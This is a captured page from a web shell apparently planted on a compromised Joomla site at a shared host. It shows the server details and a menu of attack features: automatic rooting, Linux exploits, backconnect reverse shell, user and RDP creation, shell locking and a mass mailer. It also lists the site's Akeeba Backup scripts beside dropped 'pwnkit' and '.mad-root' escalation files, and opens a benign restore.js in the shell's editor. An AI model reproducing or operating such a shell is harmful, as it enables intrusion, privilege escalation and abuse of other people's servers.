Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
com_akeeba /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Ajax.min.js
3.05
KB
-rw----r--
Alice.min.js
3.09
KB
-rw----r--
Backup.min.js
9.83
KB
-rw----r--
Configuration.min.js
31.11
KB
-rw----r--
ConfigurationWizard.min.js
7.33
KB
-rw----r--
ControlPanel.min.js
927
B
-rw----r--
DatabaseFilters.min.js
6.21
KB
-rw----r--
FileFilters.min.js
13.6
KB
-rw----r--
IncludeFolders.min.js
5.9
KB
-rw----r--
Manage.min.js
895
B
-rw----r--
Modal.min.js
4.3
KB
-rw----r--
MultipleDatabases.min.js
7.66
KB
-rw----r--
RegExDatabaseFilters.min.js
4.96
KB
-rw----r--
RegExFileFilter.min.js
5.13
KB
-rw----r--
Restore.min.js
4.5
KB
-rw----r--
Stepper.min.js
2.88
KB
-rw----r--
System.min.js
7.68
KB
-rw----r--
Tooltip.min.js
3.32
KB
-rw----r--
Transfer.min.js
11.35
KB
-rw----r--
UserInterfaceCommon.min.js
6.01
KB
-rw----r--
akeebaui.js
529
B
-rw----r--
akeebauipro.js
6.96
KB
-rw----r--
alice.js
4.45
KB
-rw----r--
backup.js
14.07
KB
-rw----r--
configuration.js
48.18
KB
-rw----r--
confwiz.js
11.23
KB
-rw----r--
dbef.js
13.02
KB
-rw----r--
eff.js
14.92
KB
-rw----r--
encryption.js
19.06
KB
-rw----r--
fsfilter.js
27.09
KB
-rw----r--
gui-helpers.js
21.69
KB
-rw----r--
multidb.js
16.48
KB
-rw----r--
piecon.min.js
2.22
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
regexdbfilter.js
11.22
KB
-rw----r--
regexfsfilter.js
11.08
KB
-rw----r--
restore.js
6.5
KB
-rw----r--
stepper.js
4.1
KB
-rw----r--
system.js
23.35
KB
-rw----r--
transfer.js
24.85
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : restore.js
/** * Akeeba Backup * * @package akeeba * @copyright Copyright (c)2009-2016 Nicholas K. Dionysopoulos * @license GNU GPL version 3 or, at your option, any later version **/ if (typeof akeeba == 'undefined') { var akeeba = {}; } if (typeof akeeba.Restore == 'undefined') { akeeba.Restore = { errorCallback: null, statistics: { inbytes: 0, outbytes: 0, files: 0 }, factory: null, password: null, ajaxURL: null, mainURL: null, translations: {} }; } (function($){ /** * Callback script for AJAX errors * @param msg * @return */ akeeba.Restore.errorCallbackDefault = function (msg) { $('#restoration-progress').hide(); $('#restoration-error').show(); $('#backup-error-message').html(msg); }; /** * Performs an AJAX request to the restoration script (restore.php) * @param data * @param successCallback * @param errorCallback * @return */ akeeba.Restore.doAjax = function (data, successCallback, errorCallback) { json = JSON.stringify(data); if (akeeba.Restore.password.length > 0) { json = AesCtr.encrypt(json, akeeba.Restore.password, 128); } var post_data = { json: json }; // Make the request uncacheable var now = new Date().getTime() / 1000; var s = parseInt(now, 10); var microtime = Math.round((now - s) * 1000) / 1000; post_data._cacheBustingJunk = microtime; var structure = { type: "POST", url: akeeba.Restore.ajaxURL, cache: false, data: post_data, timeout: 600000, success: function (msg) { // Initialize var junk = null; var message = ""; // Get rid of junk before the data var valid_pos = msg.indexOf('###'); if (valid_pos == -1) { // Valid data not found in the response msg = 'Invalid AJAX data: ' + msg; if (errorCallback == null) { if (akeeba.Restore.errorCallback != null) { akeeba.Restore.errorCallback(msg); } } else { errorCallback(msg); } return; } else if (valid_pos != 0) { // Data is prefixed with junk junk = msg.substr(0, valid_pos); message = msg.substr(valid_pos); } else { message = msg; } message = message.substr(3); // Remove triple hash in the beginning // Get of rid of junk after the data valid_pos = message.lastIndexOf('###'); message = message.substr(0, valid_pos); // Remove triple hash in the end // Decrypt if required if (akeeba.Restore.password.length > 0) { message = AesCtr.decrypt(message, akeeba.Restore.password, 128); } try { var data = JSON.parse(message); } catch (err) { errorMessage = err.message + "\n<br/>\n<pre>\n" + message + "\n</pre>"; if (errorCallback == null) { if (akeeba.Restore.errorCallback != null) { akeeba.Restore.errorCallback(errorMessage); } } else { errorCallback(errorMessage); } return; } // Call the callback function successCallback(data); }, error: function (Request, textStatus, errorThrown) { var message = 'AJAX Loading Error: ' + textStatus; if (errorCallback == null) { if (akeeba.Restore.errorCallback != null) { akeeba.Restore.errorCallback(message); } } else { errorCallback(message); } } }; $.ajax(structure); }; /** * Starts the timer for the last response timer * * @param max_allowance Maximum time allowance in seconds * @param bias Runtime bias in % */ akeeba.Restore.startTimeoutBar = function(max_allowance, bias) { var lastResponseSeconds = 0; $('#response-timer div.text').everyTime(1000, 'lastReponse', function(){ lastResponseSeconds++; var lastText = akeeba.Restore.translations['UI-LASTRESPONSE'].replace('%s', lastResponseSeconds.toFixed(0)); $('#response-timer div.text').html(lastText); }); }; /** * Resets the last response timer bar */ akeeba.Restore.resetTimeoutBar = function() { $('#response-timer div.text').stopTime(); var lastText = akeeba.Restore.translations['UI-LASTRESPONSE'].replace('%s', '0'); $('#response-timer div.text').html(lastText); }; /** * Pings the restoration script (making sure its executable!!) * @return */ akeeba.Restore.pingRestoration = function() { // Reset variables akeeba.Restore.statistics.inbytes = 0; akeeba.Restore.statistics.outbytes = 0; akeeba.Restore.statistics.files = 0; // Do AJAX post var post = { task: 'ping' }; akeeba.Restore.startTimeoutBar(5000, 80); akeeba.Restore.doAjax(post, function (data) { akeeba.Restore.start(data); }); }; /** * Starts the restoration * @return */ akeeba.Restore.start = function() { // Reset variables akeeba.Restore.statistics.inbytes = 0; akeeba.Restore.statistics.outbytes = 0; akeeba.Restore.statistics.files = 0; // Do AJAX post var post = { task: 'startRestore' }; akeeba.Restore.startTimeoutBar(5000, 80); akeeba.Restore.doAjax(post, function (data) { akeeba.Restore.step(data); }); }; /** * Steps through the restoration * @param data * @return */ akeeba.Restore.step = function(data) { akeeba.Restore.resetTimeoutBar(); if (data.status == false) { // handle failure akeeba.Restore.errorCallbackDefault(data.message); } else { if (data.done) { akeeba.Restore.factory = data.factory; // handle finish $('#restoration-progress').hide(); $('#restoration-extract-ok').show(); } else { // Add data to variables akeeba.Restore.statistics.inbytes += data.bytesIn; akeeba.Restore.statistics.outbytes += data.bytesOut; akeeba.Restore.statistics.files += data.files; // Display data $('#extbytesin').html(akeeba.Restore.statistics.inbytes); $('#extbytesout').html(akeeba.Restore.statistics.outbytes); $('#extfiles').html(akeeba.Restore.statistics.files); // Do AJAX post post = { task: 'stepRestore', factory: data.factory }; akeeba.Restore.startTimeoutBar(5000, 80); akeeba.Restore.doAjax(post, function (data) { akeeba.Restore.step(data); }); } } }; akeeba.Restore.finalize = function() { // Do AJAX post var post = { task: 'finalizeRestore', factory: akeeba.Restore.factory }; akeeba.Restore.startTimeoutBar(5000, 80); akeeba.Restore.doAjax(post, function (data) { akeeba.Restore.finished(data); }); }; akeeba.Restore.finished = function() { // We're just finished - return to the back-end Control Panel window.location = akeeba.Restore.mainURL; }; akeeba.Restore.runInstaller = function () { window.open('../installation/index.php','abiinstaller'); (function($) { $('#restoration-finalize').show(); })(akeeba.jQuery); } }(akeeba.jQuery));
Close